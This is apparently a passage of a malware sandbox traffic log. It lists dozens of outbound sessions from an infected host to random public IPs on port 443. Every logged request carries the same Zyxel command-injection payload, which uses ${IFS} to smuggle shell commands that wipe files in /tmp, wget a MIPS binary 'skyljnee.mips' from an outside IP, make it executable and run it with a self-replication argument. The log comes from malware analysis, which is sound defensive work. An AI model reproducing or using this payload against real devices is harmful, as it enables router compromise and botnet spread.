                                                        Jan 28, 2024 10:12:58.512676001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5789192.168.2.143840063.245.78.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512705088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5790192.168.2.145129299.30.79.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512772083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5791192.168.2.1457728112.118.192.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512828112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5792192.168.2.1435018150.81.181.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512854099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5793192.168.2.1453400186.236.108.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512909889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5794192.168.2.144342236.103.174.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512948990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5795192.168.2.1452202221.251.109.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.512994051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5796192.168.2.1444158139.38.121.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513044119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5797192.168.2.1455592106.206.96.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513079882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5798192.168.2.1448758205.223.56.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513134003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5799192.168.2.1439838183.166.183.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513160944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5800192.168.2.1454128205.4.185.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513216972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5801192.168.2.1432796191.12.19.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513243914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5802192.168.2.1445888134.222.236.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513274908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5803192.168.2.1444512167.50.132.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513334990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5804192.168.2.1439104169.167.48.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513375044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5805192.168.2.1438332134.128.13.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513405085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5806192.168.2.1450390178.203.65.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513453007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5807192.168.2.1455472159.102.109.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513485909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5808192.168.2.1454874194.109.124.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513528109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5809192.168.2.1434584219.29.54.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513582945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5810192.168.2.1434690220.206.114.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513633013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5811192.168.2.1438954172.242.26.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513668060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5812192.168.2.1433922131.60.108.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513725042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5813192.168.2.1451910209.112.39.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513781071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5814192.168.2.143740239.146.214.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513812065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5815192.168.2.1446172144.77.246.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513837099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5816192.168.2.1435550135.255.220.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513879061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5817192.168.2.1434398220.38.221.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513906002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5818192.168.2.143517632.180.21.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513942957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5819192.168.2.143974025.113.193.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.513983965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5820192.168.2.1446000130.204.199.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514034033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5821192.168.2.1444292195.185.57.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514081955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5822192.168.2.1457854102.229.98.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514125109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5823192.168.2.1455612197.134.86.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514142990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5824192.168.2.14355662.125.76.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514193058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5825192.168.2.1434490210.168.37.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514230013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5826192.168.2.1459672223.55.182.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514254093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5827192.168.2.144259248.84.208.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514282942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5828192.168.2.1450642164.238.79.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514343023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5829192.168.2.1458128157.136.81.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514378071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5830192.168.2.145924689.234.215.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514425993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5831192.168.2.145537876.230.216.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514451981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5832192.168.2.143603499.99.202.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514491081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5833192.168.2.1440582140.165.204.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514529943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5834192.168.2.1435022191.242.14.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514580965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5835192.168.2.145816249.18.229.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514611959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5836192.168.2.1446954114.228.27.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514633894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5837192.168.2.1433352160.6.17.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514672041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5838192.168.2.1448846111.43.52.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514712095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5839192.168.2.1434488201.224.239.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514744997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5840192.168.2.1450438181.33.167.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514795065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5841192.168.2.145430218.211.209.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514834881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5842192.168.2.1458642113.188.149.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514875889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5843192.168.2.1458706131.162.27.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514926910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5844192.168.2.1453084178.121.210.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514969110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5845192.168.2.1455142115.50.228.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.514987946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5846192.168.2.145595432.112.90.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515054941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5847192.168.2.1439742176.25.54.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515096903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5848192.168.2.1437030123.157.31.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.515136003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5849192.168.2.145618291.169.190.132443
                                                        TimestampBytes transferredDirectionData
